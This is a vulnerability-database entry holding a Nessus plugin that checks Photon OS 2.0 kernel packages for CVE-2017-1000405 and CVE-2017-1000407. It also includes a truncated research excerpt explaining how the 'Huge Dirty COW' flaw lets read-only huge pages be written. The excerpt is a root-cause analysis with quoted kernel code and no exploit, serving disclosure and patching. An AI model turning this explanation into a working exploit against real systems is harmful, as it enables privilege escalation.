Search...

Photon OS 2.0: Linux PHSA-2017-2.0-0008

2019-02-07T00:00:00

ID PHOTONOS_PHSA-2017-2_0-0008_LINUX.NASL
Type nessus
Reporter Tenable
Modified 2019-02-07T00:00:00

Description

An update of the linux package has been released.

                                        
                                            #
# (C) Tenable Network Security, Inc.`
#

# The descriptive text and package checks in this plugin were
# extracted from VMware Security Advisory PHSA-2017-2.0-0008. The text
# itself is copyright (C) VMware, Inc.

include("compat.inc");

if (description)
{
  script_id(121792);
  script_version("1.1");
  script_cvs_date("Date: 2019/02/07 18:14:47");

  script_cve_id("CVE-2017-1000405", "CVE-2017-1000407");

  script_name(english:"Photon OS 2.0: Linux PHSA-2017-2.0-0008");
  script_summary(english:"Checks the rpm output for the updated packages.");

  script_set_attribute(attribute:"synopsis", value:
"The remote PhotonOS host is missing multiple security updates.");
  script_set_attribute(attribute:"description", value:
"An update of the linux package has been released.");
  script_set_attribute(attribute:"see_also", value:"https://github.com/vmware/photon/wiki/Security-Updates-2-8.md");
  script_set_attribute(attribute:"solution", value:
"Update the affected Linux packages.");
  script_set_cvss_base_vector("CVSS2#AV:L/AC:M/Au:N/C:C/I:C/A:C");
  script_set_cvss3_base_vector("CVSS:3.0/AV:L/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H");
  script_set_attribute(attribute:"cvss_score_source", value:"CVE-2017-1000405");

  script_set_attribute(attribute:"vuln_publication_date", value:"2017/12/28");
  script_set_attribute(attribute:"patch_publication_date", value:"2017/12/28");
  script_set_attribute(attribute:"plugin_publication_date", value:"2019/02/07");

  script_set_attribute(attribute:"plugin_type", value:"local");
  script_set_attribute(attribute:"cpe", value:"p-cpe:/a:vmware:photonos:linux");
  script_set_attribute(attribute:"cpe", value:"cpe:/o:vmware:photonos:2.0");
  script_end_attributes();

  script_category(ACT_GATHER_INFO);
  script_family(english:"PhotonOS Local Security Checks");

  script_copyright(english:"This script is Copyright (C) 2019 and is owned by Tenable, Inc. or an Affiliate thereof.");

  script_dependencies("ssh_get_info.nasl");
  script_require_keys("Host/local_checks_enabled", "Host/PhotonOS/release", "Host/PhotonOS/rpm-list");

  exit(0);
}

include("audit.inc");
include("global_settings.inc");
include("rpm.inc");

if (!get_kb_item("Host/local_checks_enabled")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);

release = get_kb_item("Host/PhotonOS/release");
if (isnull(release) || release !~ "^VMware Photon") audit(AUDIT_OS_NOT, "PhotonOS");
if (release !~ "^VMware Photon (?:Linux|OS) 2\.0(\D|$)") audit(AUDIT_OS_NOT, "PhotonOS 2.0");

if (!get_kb_item("Host/PhotonOS/rpm-list")) audit(AUDIT_PACKAGE_LIST_MISSING);

cpu = get_kb_item("Host/cpu");
if (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);
if ("x86_64" &gt;!&lt; cpu && cpu !~ "^i[3-6]86$") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, "PhotonOS", cpu);

flag = 0;

if (rpm_check(release:"PhotonOS-2.0", reference:"linux-4.9.71-1.ph2")) flag++;
if (rpm_check(release:"PhotonOS-2.0", reference:"linux-4.9.71-1.ph2")) flag++;
if (rpm_check(release:"PhotonOS-2.0", reference:"linux-api-headers-4.9.71-1.ph2.noarch")) flag++;
if (rpm_check(release:"PhotonOS-2.0", reference:"linux-api-headers-4.9.71-1.ph2.noarch")) flag++;
if (rpm_check(release:"PhotonOS-2.0", reference:"linux-debuginfo-4.9.71-1.ph2")) flag++;
if (rpm_check(release:"PhotonOS-2.0", reference:"linux-debuginfo-4.9.71-1.ph2")) flag++;
if (rpm_check(release:"PhotonOS-2.0", reference:"linux-devel-4.9.71-1.ph2")) flag++;
if (rpm_check(release:"PhotonOS-2.0", reference:"linux-devel-4.9.71-1.ph2")) flag++;
if (rpm_check(release:"PhotonOS-2.0", reference:"linux-docs-4.9.71-1.ph2")) flag++;
if (rpm_check(release:"PhotonOS-2.0", reference:"linux-docs-4.9.71-1.ph2")) flag++;
if (rpm_check(release:"PhotonOS-2.0", reference:"linux-drivers-gpu-4.9.71-1.ph2")) flag++;
if (rpm_check(release:"PhotonOS-2.0", reference:"linux-drivers-gpu-4.9.71-1.ph2")) flag++;
if (rpm_check(release:"PhotonOS-2.0", reference:"linux-esx-4.9.71-1.ph2")) flag++;
if (rpm_check(release:"PhotonOS-2.0", reference:"linux-esx-4.9.71-1.ph2")) flag++;
if (rpm_check(release:"PhotonOS-2.0", reference:"linux-esx-debuginfo-4.9.71-1.ph2")) flag++;
if (rpm_check(release:"PhotonOS-2.0", reference:"linux-esx-debuginfo-4.9.71-1.ph2")) flag++;
if (rpm_check(release:"PhotonOS-2.0", reference:"linux-esx-devel-4.9.71-1.ph2")) flag++;
if (rpm_check(release:"PhotonOS-2.0", reference:"linux-esx-devel-4.9.71-1.ph2")) flag++;
if (rpm_check(release:"PhotonOS-2.0", reference:"linux-esx-docs-4.9.71-1.ph2")) flag++;
if (rpm_check(release:"PhotonOS-2.0", reference:"linux-esx-docs-4.9.71-1.ph2")) flag++;
if (rpm_check(release:"PhotonOS-2.0", reference:"linux-oprofile-4.9.71-1.ph2")) flag++;
if (rpm_check(release:"PhotonOS-2.0", reference:"linux-oprofile-4.9.71-1.ph2")) flag++;
if (rpm_check(release:"PhotonOS-2.0", reference:"linux-secure-4.9.71-1.ph2")) flag++;
if (rpm_check(release:"PhotonOS-2.0", reference:"linux-secure-4.9.71-1.ph2")) flag++;
if (rpm_check(release:"PhotonOS-2.0", reference:"linux-secure-debuginfo-4.9.71-1.ph2")) flag++;
if (rpm_check(release:"PhotonOS-2.0", reference:"linux-secure-debuginfo-4.9.71-1.ph2")) flag++;
if (rpm_check(release:"PhotonOS-2.0", reference:"linux-secure-devel-4.9.71-1.ph2")) flag++;
if (rpm_check(release:"PhotonOS-2.0", reference:"linux-secure-devel-4.9.71-1.ph2")) flag++;
if (rpm_check(release:"PhotonOS-2.0", reference:"linux-secure-docs-4.9.71-1.ph2")) flag++;
if (rpm_check(release:"PhotonOS-2.0", reference:"linux-secure-docs-4.9.71-1.ph2")) flag++;
if (rpm_check(release:"PhotonOS-2.0", reference:"linux-secure-lkcm-4.9.71-1.ph2")) flag++;
if (rpm_check(release:"PhotonOS-2.0", reference:"linux-secure-lkcm-4.9.71-1.ph2")) flag++;
if (rpm_check(release:"PhotonOS-2.0", reference:"linux-sound-4.9.71-1.ph2")) flag++;
if (rpm_check(release:"PhotonOS-2.0", reference:"linux-sound-4.9.71-1.ph2")) flag++;
if (rpm_check(release:"PhotonOS-2.0", reference:"linux-tools-4.9.71-1.ph2")) flag++;
if (rpm_check(release:"PhotonOS-2.0", reference:"linux-tools-4.9.71-1.ph2")) flag++;

if (flag)
{
  security_report_v4(
    port       : 0,
    severity   : SECURITY_WARNING,
    extra      : rpm_report_get()
  );
  exit(0);
}
else
{
  tested = pkg_tests_get();
  if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);
  else audit(AUDIT_PACKAGE_NOT_INSTALLED, "linux");
}

JSON Vulners Source

Initial Source

{"id": "PHOTONOS_PHSA-2017-2_0-0008_LINUX.NASL", "bulletinFamily": "scanner", "title": "Photon OS 2.0: Linux PHSA-2017-2.0-0008", "description": "An update of the linux package has been released.", "published": "2019-02-07T00:00:00", "modified": "2019-02-07T00:00:00", "cvss": {"score": 6.9, "vector": "AV:LOCAL/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "href": "https://www.tenable.com/plugins/index.php?view=single&id=121792", "reporter": "Tenable", "references": ["https://github.com/vmware/photon/wiki/Security-Updates-2-8.md"], "cvelist": ["CVE-2017-1000407", "CVE-2017-1000405"], "type": "nessus", "lastseen": "2019-02-08T12:51:53", "history": [], "edition": 1, "hashmap": [{"key": "bulletinFamily", "hash": "bbdaea376f500d25f6b0c1050311dd07"}, {"key": "cpe", "hash": "0744b339241e7b4792200d55ca22f8df"}, {"key": "cvelist", "hash": "155f4aaaeb54bd8f57b479000a50a6c0"}, {"key": "cvss", "hash": "e8bafdc9ad5c6f47fe1e6e5fd509b7a9"}, {"key": "description", "hash": "546469611bd2f73221700a21d5a55a80"}, {"key": "href", "hash": "979fd1e042f9f03283b877e75a2ea9d8"}, {"key": "modified", "hash": "66c3c48400cc217912c7e20b665e74c2"}, {"key": "naslFamily", "hash": "656af54dee76fcf8892568fd6ab1ba59"}, {"key": "pluginID", "hash": "ffa5ed295ceb18bb9fe730ae644175e1"}, {"key": "published", "hash": "66c3c48400cc217912c7e20b665e74c2"}, {"key": "references", "hash": "d67d992845ecec594f2c85d85ee0a860"}, {"key": "reporter", "hash": "9cf00d658b687f030ebe173a0528c567"}, {"key": "sourceData", "hash": "bbd5daefb72270d50d0013af3edaa865"}, {"key": "title", "hash": "f8f2635a0369be8dbb5b41af69f88a2b"}, {"key": "type", "hash": "5e0bd03bec244039678f2b955a2595aa"}], "hash": "e76d5d24ce8edddea2894cb2dd72919e5e70f3a27ad6b13de3074c80f85f189e", "viewCount": 3, "enchantments": {"score": {"value": 7.3, "vector": "NONE", "modified": "2019-02-08T12:51:53"}, "dependencies": {"references": [{"type": "cve", "idList": ["CVE-2017-1000407", "CVE-2017-1000405"]}, {"type": "seebug", "idList": ["SSV:96908"]}, {"type": "nessus", "idList": ["VIRTUOZZO_VZA-2017-110.NASL", "VIRTUOZZO_VZA-2017-111.NASL", "FEDORA_2017-9EA11E444D.NASL", "FEDORA_2017-B0C1F44130.NASL", "ORACLELINUX_ELSA-2018-4017.NASL", "ORACLEVM_OVMSA-2018-0012.NASL", "PHOTONOS_PHSA-2017-1_0-0095_LINUX.NASL", "SUSE_SU-2017-3225-1.NASL", "SUSE_SU-2017-3226-1.NASL", "PHOTONOS_PHSA-2017-1_0-0093_LINUX.NASL"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310873857", "OPENVAS:1361412562310873860", "OPENVAS:1361412562310843394", "OPENVAS:1361412562310843393", "OPENVAS:1361412562310843396", "OPENVAS:1361412562310843397", "OPENVAS:1361412562310843402", "OPENVAS:1361412562310843403", "OPENVAS:1361412562310843398", "OPENVAS:1361412562310843400"]}, {"type": "exploitdb", "idList": ["EDB-ID:44305", "EDB-ID:43199"]}, {"type": "oraclelinux", "idList": ["ELSA-2018-4017", "ELSA-2017-3651", "ELSA-2018-4071", "ELSA-2018-4021"]}, {"type": "suse", "idList": ["SUSE-SU-2017:3295-1", "SUSE-SU-2017:3324-1", "SUSE-SU-2017:3300-1", "SUSE-SU-2017:3226-1", "SUSE-SU-2017:3319-1", "SUSE-SU-2017:3317-1", "SUSE-SU-2017:3297-1", "SUSE-SU-2017:3225-1", "SUSE-SU-2017:3314-1", "SUSE-SU-2017:3284-1"]}, {"type": "ubuntu", "idList": ["USN-3510-1", "USN-3511-1", "USN-3510-2", "USN-3508-1", "USN-3508-2", "USN-3509-4", "USN-3509-3", "USN-3509-2", "USN-3509-1", "USN-3507-2"]}, {"type": "redhat", "idList": ["RHSA-2018:0180", "RHSA-2019:1170"]}, {"type": "threatpost", "idList": ["THREATPOST:A28CC7C8B76DAF5EBFF24CE8575A2087"]}, {"type": "amazon", "idList": ["ALAS-2017-937", "ALAS-2018-956"]}, {"type": "cloudfoundry", "idList": ["CFOUNDRY:0BD4290D520A235B05B93F0ACF4B7C2B", "CFOUNDRY:74EC63FE794662FC4DFD36709B39475A"]}, {"type": "debian", "idList": ["DEBIAN:DSA-4073-1:79398", "DEBIAN:DSA-4082-1:57979"]}], "modified": "2019-02-08T12:51:53"}, "vulnersScore": 7.3}, "objectVersion": "1.3", "sourceData": "#\n# (C) Tenable Network Security, Inc.`\n#\n\n# The descriptive text and package checks in this plugin were\n# extracted from VMware Security Advisory PHSA-2017-2.0-0008. The text\n# itself is copyright (C) VMware, Inc.\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(121792);\n script_version(\"1.1\");\n script_cvs_date(\"Date: 2019/02/07 18:14:47\");\n\n script_cve_id(\"CVE-2017-1000405\", \"CVE-2017-1000407\");\n\n script_name(english:\"Photon OS 2.0: Linux PHSA-2017-2.0-0008\");\n script_summary(english:\"Checks the rpm output for the updated packages.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote PhotonOS host is missing multiple security updates.\");\n script_set_attribute(attribute:\"description\", value:\n\"An update of the linux package has been released.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://github.com/vmware/photon/wiki/Security-Updates-2-8.md\");\n script_set_attribute(attribute:\"solution\", value:\n\"Update the affected Linux packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:L/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2017-1000405\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2017/12/28\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2017/12/28\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2019/02/07\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:vmware:photonos:linux\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:vmware:photonos:2.0\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"PhotonOS Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2019 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/PhotonOS/release\", \"Host/PhotonOS/rpm-list\");\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\n\nrelease = get_kb_item(\"Host/PhotonOS/release\");\nif (isnull(release) || release !~ \"^VMware Photon\") audit(AUDIT_OS_NOT, \"PhotonOS\");\nif (release !~ \"^VMware Photon (?:Linux|OS) 2\\.0(\\D|$)\") audit(AUDIT_OS_NOT, \"PhotonOS 2.0\");\n\nif (!get_kb_item(\"Host/PhotonOS/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"PhotonOS\", cpu);\n\nflag = 0;\n\nif (rpm_check(release:\"PhotonOS-2.0\", reference:\"linux-4.9.71-1.ph2\")) flag++;\nif (rpm_check(release:\"PhotonOS-2.0\", reference:\"linux-4.9.71-1.ph2\")) flag++;\nif (rpm_check(release:\"PhotonOS-2.0\", reference:\"linux-api-headers-4.9.71-1.ph2.noarch\")) flag++;\nif (rpm_check(release:\"PhotonOS-2.0\", reference:\"linux-api-headers-4.9.71-1.ph2.noarch\")) flag++;\nif (rpm_check(release:\"PhotonOS-2.0\", reference:\"linux-debuginfo-4.9.71-1.ph2\")) flag++;\nif (rpm_check(release:\"PhotonOS-2.0\", reference:\"linux-debuginfo-4.9.71-1.ph2\")) flag++;\nif (rpm_check(release:\"PhotonOS-2.0\", reference:\"linux-devel-4.9.71-1.ph2\")) flag++;\nif (rpm_check(release:\"PhotonOS-2.0\", reference:\"linux-devel-4.9.71-1.ph2\")) flag++;\nif (rpm_check(release:\"PhotonOS-2.0\", reference:\"linux-docs-4.9.71-1.ph2\")) flag++;\nif (rpm_check(release:\"PhotonOS-2.0\", reference:\"linux-docs-4.9.71-1.ph2\")) flag++;\nif (rpm_check(release:\"PhotonOS-2.0\", reference:\"linux-drivers-gpu-4.9.71-1.ph2\")) flag++;\nif (rpm_check(release:\"PhotonOS-2.0\", reference:\"linux-drivers-gpu-4.9.71-1.ph2\")) flag++;\nif (rpm_check(release:\"PhotonOS-2.0\", reference:\"linux-esx-4.9.71-1.ph2\")) flag++;\nif (rpm_check(release:\"PhotonOS-2.0\", reference:\"linux-esx-4.9.71-1.ph2\")) flag++;\nif (rpm_check(release:\"PhotonOS-2.0\", reference:\"linux-esx-debuginfo-4.9.71-1.ph2\")) flag++;\nif (rpm_check(release:\"PhotonOS-2.0\", reference:\"linux-esx-debuginfo-4.9.71-1.ph2\")) flag++;\nif (rpm_check(release:\"PhotonOS-2.0\", reference:\"linux-esx-devel-4.9.71-1.ph2\")) flag++;\nif (rpm_check(release:\"PhotonOS-2.0\", reference:\"linux-esx-devel-4.9.71-1.ph2\")) flag++;\nif (rpm_check(release:\"PhotonOS-2.0\", reference:\"linux-esx-docs-4.9.71-1.ph2\")) flag++;\nif (rpm_check(release:\"PhotonOS-2.0\", reference:\"linux-esx-docs-4.9.71-1.ph2\")) flag++;\nif (rpm_check(release:\"PhotonOS-2.0\", reference:\"linux-oprofile-4.9.71-1.ph2\")) flag++;\nif (rpm_check(release:\"PhotonOS-2.0\", reference:\"linux-oprofile-4.9.71-1.ph2\")) flag++;\nif (rpm_check(release:\"PhotonOS-2.0\", reference:\"linux-secure-4.9.71-1.ph2\")) flag++;\nif (rpm_check(release:\"PhotonOS-2.0\", reference:\"linux-secure-4.9.71-1.ph2\")) flag++;\nif (rpm_check(release:\"PhotonOS-2.0\", reference:\"linux-secure-debuginfo-4.9.71-1.ph2\")) flag++;\nif (rpm_check(release:\"PhotonOS-2.0\", reference:\"linux-secure-debuginfo-4.9.71-1.ph2\")) flag++;\nif (rpm_check(release:\"PhotonOS-2.0\", reference:\"linux-secure-devel-4.9.71-1.ph2\")) flag++;\nif (rpm_check(release:\"PhotonOS-2.0\", reference:\"linux-secure-devel-4.9.71-1.ph2\")) flag++;\nif (rpm_check(release:\"PhotonOS-2.0\", reference:\"linux-secure-docs-4.9.71-1.ph2\")) flag++;\nif (rpm_check(release:\"PhotonOS-2.0\", reference:\"linux-secure-docs-4.9.71-1.ph2\")) flag++;\nif (rpm_check(release:\"PhotonOS-2.0\", reference:\"linux-secure-lkcm-4.9.71-1.ph2\")) flag++;\nif (rpm_check(release:\"PhotonOS-2.0\", reference:\"linux-secure-lkcm-4.9.71-1.ph2\")) flag++;\nif (rpm_check(release:\"PhotonOS-2.0\", reference:\"linux-sound-4.9.71-1.ph2\")) flag++;\nif (rpm_check(release:\"PhotonOS-2.0\", reference:\"linux-sound-4.9.71-1.ph2\")) flag++;\nif (rpm_check(release:\"PhotonOS-2.0\", reference:\"linux-tools-4.9.71-1.ph2\")) flag++;\nif (rpm_check(release:\"PhotonOS-2.0\", reference:\"linux-tools-4.9.71-1.ph2\")) flag++;\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_WARNING,\n extra : rpm_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"linux\");\n}\n", "naslFamily": "PhotonOS Local Security Checks", "pluginID": "121792", "cpe": ["p-cpe:/a:vmware:photonos:linux", "cpe:/o:vmware:photonos:2.0"]}

{"cve": [{"lastseen": "2019-09-12T16:44:18", "bulletinFamily": "NVD", "description": "The Linux Kernel 2.6.32 and later are affected by a denial of service, by flooding the diagnostic port 0x80 an exception can be triggered leading to a kernel panic.", "modified": "2019-05-14T22:29:00", "id": "CVE-2017-1000407", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2017-1000407", "published": "2017-12-11T21:29:00", "title": "CVE-2017-1000407", "type": "cve", "cvss": {"score": 6.1, "vector": "AV:A/AC:L/Au:N/C:N/I:N/A:C"}}, {"lastseen": "2019-09-12T16:44:18", "bulletinFamily": "NVD", "description": "The Linux Kernel versions 2.6.38 through 4.14 have a problematic use of pmd_mkdirty() in the touch_pmd() function inside the THP implementation. touch_pmd() can be reached by get_user_pages(). In such case, the pmd will become dirty. This scenario breaks the new can_follow_write_pmd()'s logic - pmd can become dirty without going through a COW cycle. This bug is not as severe as the original \"Dirty cow\" because an ext4 file (or any other regular file) cannot be mapped using THP. Nevertheless, it does allow us to overwrite read-only huge pages. For example, the zero huge page and sealed shmem files can be overwritten (since their mapping can be populated using THP). Note that after the first write page-fault to the zero page, it will be replaced with a new fresh (and zeroed) thp.", "modified": "2018-02-13T02:29:00", "id": "CVE-2017-1000405", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2017-1000405", "published": "2017-11-30T22:29:00", "title": "CVE-2017-1000405", "type": "cve", "cvss": {"score": 6.9, "vector": "AV:L/AC:M/Au:N/C:C/I:C/A:C"}}], "seebug": [{"lastseen": "2017-12-25T18:30:18", "bulletinFamily": "exploit", "description": "The \u201cDirty COW\u201d vulnerability ([CVE-2016\u20135195](https://medium.com/r/?url=https%3A%2F%2Fcve.mitre.org%2Fcgi-bin%2Fcvename.cgi%3Fname%3DCVE-2016-5195)) is one of the most hyped and branded vulnerabilities published. Every Linux version from the last decade, including Android, desktops and servers was vulnerable. The impact was vast\u200a\u2014\u200amillions of users could be compromised easily and reliably, bypassing common exploit defenses.\r\n\r\nPlenty of information was published about the vulnerability, but its patch was not analyzed in detail.\r\n\r\nWe at Bindecy were interested to study the patch and all of its implications. Surprisingly, despite the enormous publicity the bug had received, we discovered that the patch was incomplete.\r\n\r\n### \"Dirty COW\" recap\r\nFirst, we need a full understanding of the original Dirty COW exploit. We\u2019ll assume basic understanding of the Linux memory manager. We won\u2019t recover the original gory details, as talented people have [already done](https://medium.com/r/?url=https%3A%2F%2Fchao-tic.github.io%2Fblog%2F2017%2F05%2F24%2Fdirty-cow) so.\r\n\r\nThe original vulnerability was in the `get_user_pages` function. This function is used to get the physical pages behind virtual addresses in user processes. The caller has to specify what kind of actions he intends to perform on these pages (touch, write, lock, etc\u2026), so the memory manager could prepare the pages accordingly. Specifically, when planning to perform a write action on a page inside a private mapping, the page may need to go through a COW (Copy-On-Write) cycle\u200a\u2014\u200athe original, \u201cread-only\u201d page is copied to a new page which is writable. The original page could be \u201cprivileged\u201d\u200a\u2014\u200ait could be mapped in other processes as well, and might even be written back to the disk after it\u2019s modified.\r\n\r\nLet\u2019s now take a look at the relevant code in `__get_user_pages`:\r\n```\r\n\r\nstatic long __get_user_pages(struct task_struct *tsk, struct mm_struct *mm,\r\n unsigned long start, unsigned long nr_pages,\r\n unsigned int gup_flags, struct page **pages,\r\n struct vm_area_struct **vmas, int *nonblocking)\r\n{\r\n // ...\r\n do {\r\n struct page *page;\r\n unsigned int foll_flags = gup_flags;\r\n // ...\r\n vma = find_extend_vma(mm, start);\r\n // ... \r\n \r\nretry:\r\n // ...\r\n cond_resched();\r\n page = follow_page_mask(vma, start, foll_flags, &page_mask);\r\n if (!page) {\r\n int ret;\r\n ret = faultin_page(tsk, vma, start, &foll_flags,\r\n nonblocking);\r\n switch (ret) {\r\n case 0:\r\n goto retry;\r\n case -EFAULT:\r\n case -ENOMEM:\r\n case -EHWPOISON:\r\n return i ? i : ret;\r\n case -EBUSY:\r\n return i;\r\n case -ENOENT:\r\n goto next_page;\r\n }\r\n BUG();\r\n }\r\n // ...\r\n \r\nnext_page:\r\n // ...\r\n nr_pages -= page_increm;\r\n } while (nr_pages);\r\n return i;\r\n}\r\n```\r\n\r\nThe `while` loop\u2019s goal is to fetch each page in the requested page range. Each page has to be faulted in until our requirements are satisfied\u200a\u2014\u200athat\u2019s what the `retry` label is used for.\r\n\r\n`follow_page_mask`\u2019s role is to scan the page tables to get the physical page for the given address (while taking into account the PTE permissions), or fail in case the request can\u2019t be satisfied. During `follow_page_mask`\u2019s operation the PTE\u2019s spinlock is acquired\u2014 this guarantees the physical page won\u2019t be released before we grab a reference.\r\n\r\n`faultin_page` requests the memory manager to handle the fault in the given address with the specified permissions (also under the PTE\u2019s spinlock). Note that after a successful call to `faultin_page` the lock is released\u200a\u2014\u200ait\u2019s not guaranteed that `follow_page_mask` will succeed in the next retry; another piece of code might have messed with our page.\r\n\r\nThe original vulnerable code resided at the end of faultin_page:\r\n```\r\nif ((ret & VM_FAULT_WRITE) && !(vma->vm_flags & VM_WRITE))\r\n *flags &= ~FOLL_WRITE;\r\n```\r\n\r\nThe reason for removing the `FOLL_WRITE` flag is to take into account the case the `FOLL_FORCE` flag is applied on a read-only VMA (when the `VM_MAYWRITE` flag is set in the VMA). In that case, the `pte_maybe_mkwrite` function won\u2019t set the write bit, however the faulted-in page is indeed ready for writing.\r\n\r\nIf the page went through a COW cycle (marked by the `VM_FAULT_WRITE` flag) while performing faultin_page and the VMA is not writable, the `FOLL_WRITE flag` is removed from the next attempt to access the page\u200a\u2014\u200aonly read permissions will be requested.\r\n\r\nIf the first `follow_page_mask` fails because the page was read-only or not present, we\u2019ll try to fault it in. Now let\u2019s imagine that during that time, until the next attempt to get the page, we\u2019ll get rid of the COW version (e.g. by using `madvise(MADV_DONTNEED)`).\r\n\r\nThe next call to `faultin_page` will be made without the `FOLL_WRITE` flag, so we\u2019ll get the read-only version of the page from the page cache. Now, the next call to `follow_page_mask` will also happen without the `FOLL_WRITE` flag, so it will return the privileged read-only page\u200a\u2014\u200aas opposed to the caller\u2019s original request for a writable version of the page.\r\n\r\nBasically, the aforementioned flow is the Dirty COW vulnerability\u200a\u2014\u200ait allows us to write to the read-only privileged version of a page. The following fix was introduced in `faultin_page`:\r\n```\r\nif ((ret & VM_FAULT_WRITE) && !(vma->vm_flags & VM_WRITE))\r\n *flags |= FOLL_COW; // Instead of *flags &= ~FOLL_WRITE;\r\n```\r\n\r\n\r\nAnd a new function, which is called by `follow_page_mask`, was added:\r\n```\r\n/*\r\n * FOLL_FORCE can write to even unwritable pte's, but only\r\n * after we've gone through a COW cycle and they are dirty.\r\n */\r\nstatic inline bool can_follow_write_pte(pte_t pte, unsigned int flags)\r\n{\r\n\treturn pte_write(pte) ||\r\n\t\t((flags & FOLL_FORCE) && (flags & FOLL_COW) && pte_dirty(pte));\r\n}\r\n```\r\n\r\n\r\n\r\nInstead of reducing the requested permissions, `get_user_pages` now remembers the fact the we went through a COW cycle. On the next iteration, we would be able to get a read-only page for a write operation only if the `FOLL_FORCE` and `FOLL_COW` flags are specified, and that the PTE is marked as dirty.\r\n\r\nThis patch assumes that the read-only privileged copy of a page will never have a PTE pointing to it with the dirty bit on\u200a\u2014\u200aa reasonable assumption\u2026 or is it?\r\n\r\n### Transparent Huge Pages (THP)\r\nNormally, Linux usually uses a 4096-bytes long pages. In order to enable the system to manage large amounts of memory, we can either increase the number of page table entries, or use larger pages. We focus on the second method, which is implemented in Linux by using [huge pages](https://medium.com/r/?url=https%3A%2F%2Fgithub.com%2Florenzo-stoakes%2Flinux-vm-notes%2Fblob%2Fmaster%2Fsections%2Ftrans-huge-pages.md).\r\n\r\nA huge page is a 2MB long page. One of the ways to utilize this feature is through the Transparent Huge Pages mechanism. While there are other ways to get huge pages, they are outside of our scope.\r\n\r\nThe kernel will attempt to satisfy relevant memory allocations using huge pages. THP are swappable and \u201cbreakable\u201d (i.e. can be split into normal 4096-bytes pages), and can be used in anonymous, shmem and tmpfs mappings (the latter two are true only in newer kernel versions).\r\n\r\nUsually (depending on the compilation flags and the machine configuration) the default THP support is for anonymous mapping only. Shmem and tmpfs support can be turned on manually, and in general THP support can be turned on and off while the system is running by writing to some kernel\u2019s special files.\r\n\r\nAn important optimization opportunity is to coalesce normal pages into huge pages. A special daemon called khugepaged scans constantly for possible candidate pages that could be merged into huge pages. Obviously, to be a candidate, a VMA must cover a whole, aligned 2MB memory range.\r\n\r\nTHP is implemented by turning on the `_PAGE_PSE` bit of the PMD (Page Medium Directory, one level above the PTE level). The PMD thus points to a 2MB physical page, instead of a directory of PTEs. Each time the page tables are scanned, the PMDs must be checked with the `pmd_trans_huge` function, so we can decide whether the PMD points to a pfn or a directory of PTEs. On some architectures, huge PUDs (Page Upper Directory) exist as well, resulting in 1GB pages.\r\n\r\nTHP is supported since kernel 2.6.38. On most Android devices the THP subsystem is not enabled.\r\n\r\n### The bug\r\nDelving into the Dirty COW patch code that deals with THP, we can see that the same logic of `can_follow_write_pte` was applied to huge PMDs. A matching function called `can_follow_write_pm`d was added:\r\n```\r\nstatic inline bool can_follow_write_pmd(pmd_t pmd, unsigned int flags)\r\n{\r\n return pmd_write(pmd) ||\r\n ((flags & FOLL_FORCE) && (flags & FOLL_COW) && pmd_dirty(pmd));\r\n}\r\n```\r\n\r\nHowever, in the huge PMD case, a page can be marked dirty without going through a COW cycle, using the `touch_pmd` function:\r\n```\r\nstatic void touch_pmd(struct vm_area_struct *vma, unsigned long addr,\r\n pmd_t *pmd)\r\n{\r\n pmd_t _pmd;\r\n\r\n /*\r\n * We should set the dirty bit only for FOLL_WRITE but for now\r\n * the dirty bit in the pmd is meaningless. And if the dirty\r\n * bit will become meaningful and we'll only set it with\r\n * FOLL_WRITE, an atomic set_bit will be required on the pmd to\r\n * set the young bit, instead of the current set_pmd_at.\r\n */\r\n _pmd = pmd_mkyoung(pmd_mkdirty(*pmd));\r\n if (pmdp_set_access_flags(vma, addr & HPAGE_PMD_MASK,\r\n pmd, _pmd, 1))\r\n update_mmu_cache_pmd(vma, addr, pmd);\r\n}\r\n```\r\n\r\n\r\n\r\nThis function is reached by `follow_page_mask`, which will be called each time `get_user_pages` tries to get a huge page. Obviously, the comment is incorrect and nowadays the dirty bit is NOT meaningless. In particular\u200a\u2014\u200awhen using `get_user_pages` to read a huge page, that page will be marked dirty without going through a COW cycle, and `can_follow_write_pmd`\u2019s logic is now broken.\r\n\r\nAt this point, exploiting the bug is 